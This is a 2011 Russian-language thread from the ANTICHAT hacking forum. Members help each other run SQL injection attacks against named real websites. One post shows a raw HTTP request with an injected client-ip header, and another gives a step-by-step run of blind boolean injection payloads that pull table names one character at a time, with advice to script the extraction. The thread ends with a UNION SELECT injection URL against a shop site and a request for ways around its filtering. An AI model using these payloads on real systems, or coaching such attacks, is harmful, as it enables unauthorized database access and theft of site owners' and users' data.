ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
02.06.2011, 19:38
|
|
Участник форума
Регистрация: 07.03.2008
Сообщений: 141
Провел на форуме:
405538
Репутация:
23
|
|
Сообщение от None
SELECT id, date FROM post ORDER BY date desc LIMIT 1,
$inj
Что-нибудь было придумано для решения SQL-инжекций в таких запросах?
UNION SELECT использовать соответсвенно не дает (Incorrect usage of UNION and ORDER BY).
|
|
|
02.06.2011, 21:29
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557
Репутация:
606
|
|
/showthread.php?t=56446
|
|
|
|
02.06.2011, 21:41
|
|
Участник форума
Регистрация: 07.03.2008
Сообщений: 141
Провел на форуме:
405538
Репутация:
23
|
|
/showpost.php?p=535989&postcount=4
>24.12.2007, 20:40
Вот я и спрашиваю, а изменилось ли что-нибудь?
|
|
|
|
03.06.2011, 05:03
|
|
Guest
Сообщений: n/a
Провел на форуме:
124363
Репутация:
11
|
|
вот ссылка
Сообщение от None
http://ttic.ru/counter/
в header вписывая client-ip: 1' выходит скуля
Но при раскручивании ничего не выявляет и не показывает!
Помогите плз! |
|
|
|
03.06.2011, 05:27
|
|
Новичок
Регистрация: 04.11.2004
Сообщений: 5
Провел на форуме:
4512
Репутация:
0
|
|
Сообщение от Faaax
Faaax said:
в header вписывая client-ip: 1' выходит скуля
У меня ничего не выходит. Напиши HTTP-запрос и ответ, в котором ты нашел уязвимость.
Раскрытие пути - http://ttic.ru/modules/counter/mod.php
|
|
|
|
03.06.2011, 05:41
|
|
Guest
Сообщений: n/a
Провел на форуме:
124363
Репутация:
11
|
|
Код:
Code:
Host: ttic.ru
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: ru-ru,ru;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Accept-Charset: windows-1251,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
DNT: 1
Cookie: PHPSESSID=b6304a7231ca8359ec09f27330a48932
Connection: keep-alive
Cache-Control: max-age=0
client-ip: 1'
через дополнение mozilla live http replay |
|
|
|
03.06.2011, 06:24
|
|
Новичок
Регистрация: 04.11.2004
Сообщений: 5
Провел на форуме:
4512
Репутация:
0
|
|
Очень интересная инъекция. Один из вариантов решения:
client-ip: -1' union select 1,2,3 from information_schema.tables where '1'='1 - true ("You have been banned")
client-ip: -1' union select 1,2,3 from information_schema.tables where '1'='2 - false (страница без изменений)
|
|
|
|
03.06.2011, 06:30
|
|
Guest
Сообщений: n/a
Провел на форуме:
124363
Репутация:
11
|
|
вот и я о том же,этот запрос я тоже пробовал,что меня и огорчило!
|
|
|
|
03.06.2011, 06:40
|
|
Новичок
Регистрация: 04.11.2004
Сообщений: 5
Провел на форуме:
4512
Репутация:
0
|
|
Сообщение от Faaax
Faaax said:
вот и я о том же,этот запрос я тоже пробовал,что меня и огорчило!
Тут нечему огорчаться. Пиши скрипт и выводи все, что хочешь =)
client-ip: -1' union select 1,2,3 from information_schema.tables where ascii(mid((select group_concat(table_name) from information_schema.tables where table_name like '%user%'),1,1))>128 and '1'='1 нет
client-ip: -1' union select 1,2,3 from information_schema.tables where ascii(mid((select group_concat(table_name) from information_schema.tables where table_name like '%user%'),1,1))>64 and '1'='1 да
client-ip: -1' union select 1,2,3 from information_schema.tables where ascii(mid((select group_concat(table_name) from information_schema.tables where table_name like '%user%'),1,1))>96 and '1'='1 нет
client-ip: -1' union select 1,2,3 from information_schema.tables where ascii(mid((select group_concat(table_name) from information_schema.tables where table_name like '%user%'),1,1))>80 and '1'='1 да
client-ip: -1' union select 1,2,3 from information_schema.tables where ascii(mid((select group_concat(table_name) from information_schema.tables where table_name like '%user%'),1,1))>88 and '1'='1 нет
client-ip: -1' union select 1,2,3 from information_schema.tables where ascii(mid((select group_concat(table_name) from information_schema.tables where table_name like '%user%'),1,1))>84 and '1'='1 да
client-ip: -1' union select 1,2,3 from information_schema.tables where ascii(mid((select group_concat(table_name) from information_schema.tables where table_name like '%user%'),1,1))>86 and '1'='1 нет
client-ip: -1' union select 1,2,3 from information_schema.tables where ascii(mid((select group_concat(table_name) from information_schema.tables where table_name like '%user%'),1,1))>85 and '1'='1 нет
Код первого символа - 85
|
|
|
|
03.06.2011, 07:07
|
|
Guest
Сообщений: n/a
Провел на форуме:
124363
Репутация:
11
|
|
M_cript
спасибо за помощь
есть ещё вопросик
есть скуля,но в ней фильтруется и and и union
Код:
Code:
http://www.shoptop.ru/sitemap.html?lim1=8250%27%20&&%201=2%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56%20#
как обойти фильтрацию union select?
|
|
|
|
|
 |
|
|
Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
|
|
|
|
Похожие темы
Комбинированный вид